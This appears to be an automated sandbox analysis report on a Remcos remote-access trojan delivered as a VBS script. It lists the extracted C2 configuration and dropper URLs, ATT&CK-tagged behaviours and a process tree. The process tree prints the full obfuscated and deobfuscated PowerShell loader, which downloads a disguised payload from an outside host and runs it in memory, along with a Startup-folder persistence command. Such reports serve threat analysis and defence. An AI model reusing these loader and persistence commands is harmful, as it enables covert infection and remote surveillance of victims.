remcos | 312971f40612d0785da650c0627161e1358e04fd134cb4c382252f0ca8988891

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-10-2024 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

312971f40612d0785da650c0627161e1358e04fd134cb4c382252f0ca8988891.vbs
Size

193KB
MD5

7bf746f21b05c1eb932ba35c5215e940
SHA1

aa69f725076d84e5fac54816caf29864d007e8da
SHA256

312971f40612d0785da650c0627161e1358e04fd134cb4c382252f0ca8988891
SHA512

4d85a6ed27ba76fc295ea8bd24cb03bd801bf15d74561af5e24d77ff321960fdc32a6ada12b06865ce3e0002c422ce02ef3e6e11a97be1f8b47cfe6e8facd29f
SSDEEP

3072:8mpzxQF4KEDwjHUiIgt5p5Gw4fiLQtUWBrSp8muIJ8oH7lT:8FF4KEMjHiNrSV8CV

Score

10^/10

remcos octobers discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Extracted

Family

remcos

Botnet

OCTOBERS

ab9001.ddns.net:23782

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
VLC.exe
copy_folder
VLC
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Chrorne-28R56P
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Rmc
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 2 IoCs

flow	pid	Process
24	4484	powershell.exe
31	4484	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2836	powershell.exe
4484	powershell.exe
4072	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dentona.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dentona.vbs	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 4484 set thread context of 4016	4484	powershell.exe	108
PID 4016 set thread context of 4116	4016	AddInProcess32.exe	109
PID 4016 set thread context of 4568	4016	AddInProcess32.exe	138
PID 4016 set thread context of 5284	4016	AddInProcess32.exe	151
PID 4016 set thread context of 5308	4016	AddInProcess32.exe	163
PID 4016 set thread context of 3112	4016	AddInProcess32.exe	173
PID 4016 set thread context of 536	4016	AddInProcess32.exe	192
PID 4016 set thread context of 2504	4016	AddInProcess32.exe	202
PID 4016 set thread context of 6896	4016	AddInProcess32.exe	216

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4360	cmd.exe
4232	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4232	PING.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
4072	powershell.exe
4072	powershell.exe
2836	powershell.exe
2836	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4484	powershell.exe
4140	msedge.exe
4140	msedge.exe
748	msedge.exe
748	msedge.exe
4348	identity_helper.exe
4348	identity_helper.exe
6604	msedge.exe
6604	msedge.exe
6604	msedge.exe
6604	msedge.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
4016	AddInProcess32.exe
4016	AddInProcess32.exe
4016	AddInProcess32.exe
4016	AddInProcess32.exe
4016	AddInProcess32.exe
4016	AddInProcess32.exe
4016	AddInProcess32.exe
4016	AddInProcess32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 33 IoCs

pid	Process
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4072	powershell.exe
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	4484	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe
748	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4016	AddInProcess32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 316 wrote to memory of 4360	316	WScript.exe	84
PID 316 wrote to memory of 4360	316	WScript.exe	84
PID 4360 wrote to memory of 4232	4360	cmd.exe	86
PID 4360 wrote to memory of 4232	4360	cmd.exe	86
PID 4360 wrote to memory of 4072	4360	cmd.exe	98
PID 4360 wrote to memory of 4072	4360	cmd.exe	98
PID 316 wrote to memory of 2836	316	WScript.exe	99
PID 316 wrote to memory of 2836	316	WScript.exe	99
PID 2836 wrote to memory of 4484	2836	powershell.exe	102
PID 2836 wrote to memory of 4484	2836	powershell.exe	102
PID 4484 wrote to memory of 916	4484	powershell.exe	104
PID 4484 wrote to memory of 916	4484	powershell.exe	104
PID 4484 wrote to memory of 916	4484	powershell.exe	104
PID 4484 wrote to memory of 4128	4484	powershell.exe	105
PID 4484 wrote to memory of 4128	4484	powershell.exe	105
PID 4484 wrote to memory of 4128	4484	powershell.exe	105
PID 4484 wrote to memory of 2436	4484	powershell.exe	106
PID 4484 wrote to memory of 2436	4484	powershell.exe	106
PID 4484 wrote to memory of 2436	4484	powershell.exe	106
PID 4484 wrote to memory of 2768	4484	powershell.exe	107
PID 4484 wrote to memory of 2768	4484	powershell.exe	107
PID 4484 wrote to memory of 2768	4484	powershell.exe	107
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4484 wrote to memory of 4016	4484	powershell.exe	108
PID 4016 wrote to memory of 4116	4016	AddInProcess32.exe	109
PID 4016 wrote to memory of 4116	4016	AddInProcess32.exe	109
PID 4016 wrote to memory of 4116	4016	AddInProcess32.exe	109
PID 4016 wrote to memory of 4116	4016	AddInProcess32.exe	109
PID 4116 wrote to memory of 748	4116	svchost.exe	112
PID 4116 wrote to memory of 748	4116	svchost.exe	112
PID 748 wrote to memory of 3636	748	msedge.exe	113
PID 748 wrote to memory of 3636	748	msedge.exe	113
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114
PID 748 wrote to memory of 1492	748	msedge.exe	114

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\312971f40612d0785da650c0627161e1358e04fd134cb4c382252f0ca8988891.vbs"
1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\312971f40612d0785da650c0627161e1358e04fd134cb4c382252f0ca8988891.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.anotned.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4360
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4232
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\312971f40612d0785da650c0627161e1358e04fd134cb4c382252f0ca8988891.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.anotned.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVsTGlEWzFdKyRTaEVMTElkWzEzXSsneCcpKCAoKCd7MH1pbWFnZVVyJysnbCA9IHsxfWh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZWFkcy9tYWluL0RldGFoTm90ZV9WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVuJysndDt7MH1pbWFnZUJ5dGVzID0gezB9Jysnd2ViQ2xpZW50LkRvd25sb2FkRGF0YSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9c3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBJysnUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfScrJ3N0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgezB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3RoO3swfWJhJysnc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJJysnbmRleDt7MH1iYXNlNjRDbycrJ21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCAnKyd7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlJysnNjRTJysndHJpbmcoezB9YmFzZTY0Q29tbWFuZCk7ezB9bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzJysnZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyknKyc7ezB9dmFpTWV0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkcnKydldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCh7MX0wLzYxNnJyL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgJysnezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9QWRkSW5Qcm8nKydjZXNzMzJ7MX0sIHsnKycxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLUZbY2hhUl0zNixbY2hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHElLiD[1]+$ShELLId[13]+'x')( (('{0}imageUr'+'l = {1}https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg {1};{0}webClient = New-Object System.Net.WebClien'+'t;{0}imageBytes = {0}'+'webClient.DownloadData({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString({0}imageBytes);{0}startFlag = {1}<<BASE64_STA'+'RT>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}'+'startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Length;{0}ba'+'se64Length = {0}endIndex - {0}startI'+'ndex;{0}base64Co'+'mmand = {0}imageText.Substring({0}startIndex, '+'{0}base64Length);{0}commandBytes = [System.Convert]::FromBase'+'64S'+'tring({0}base64Command);{0}loadedAssembly = [System.Reflection.Ass'+'embly]::Load({0}commandBytes)'+';{0}vaiMethod = [dnlib.IO'+'.Home].G'+'etMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @({1}0/616rr/d/ee.etsap//:sptth{1}'+', '+'{1}desa'+'tivado{1}, {1}desativado{1}, {1}desa'+'tivado{1}, {1}AddInPro'+'cess32{1}, {'+'1}desativado{1}, {1}desativado{1}));') -F[chaR]36,[chaR]39))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4484
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:4128
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:2436
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      PID:2768
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4016
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4116
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:3636
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
        7⤵
        
        PID:1492
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4140
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2912 /prefetch:8
        7⤵
        
        PID:3668
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
        7⤵
        
        PID:4232
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        7⤵
        
        PID:5056
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4180 /prefetch:8
        7⤵
        
        PID:3120
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4180 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4348
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
        7⤵
        
        PID:1788
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
        7⤵
        
        PID:3288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
        7⤵
        
        PID:2096
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1
        7⤵
        
        PID:832
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
        7⤵
        
        PID:4504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
        7⤵
        
        PID:4600
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
        7⤵
        
        PID:4556
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
        7⤵
        
        PID:5784
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
        7⤵
        
        PID:5864
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
